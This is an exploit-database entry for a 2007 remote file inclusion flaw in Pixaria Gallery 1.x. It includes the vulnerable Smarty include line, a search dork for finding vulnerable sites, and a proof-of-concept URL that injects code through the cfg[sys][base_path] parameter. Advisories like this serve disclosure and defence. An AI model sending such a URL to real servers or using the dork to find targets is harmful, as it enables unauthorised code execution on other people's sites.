header-logo
Suggest Exploit
vendor:
Pixaria Gallery
by:
irvian
5.5
CVSS
MEDIUM
Remote File Include
CWE
Product Name: Pixaria Gallery
Affected Version From: Pixaria Gallery 1.x
Affected Version To: Pixaria Gallery 1.x
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability

The Pixaria Gallery 1.x version is vulnerable to remote file inclusion. The vulnerability exists in the '/resources/includes/class.Smarty.php' file, where it loads the main Smarty class. An attacker can exploit this vulnerability by passing malicious code in the 'cfg[sys][base_path]' parameter, allowing them to include arbitrary files from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Pixaria Gallery or implement proper input validation and sanitization to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts            : Pixaria Gallery 1.x
# Discovered By : irvian
# scripts site      : http://pixaria.com/
# Thanks To       : #hitamputih  #nyubicrew  #patihack
# special To       : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork                : powered by Pixaria. Gallery
------------------------------------------------------------------------------------------
bug found:

/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");


Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode] 

# milw0rm.com [2007-04-14]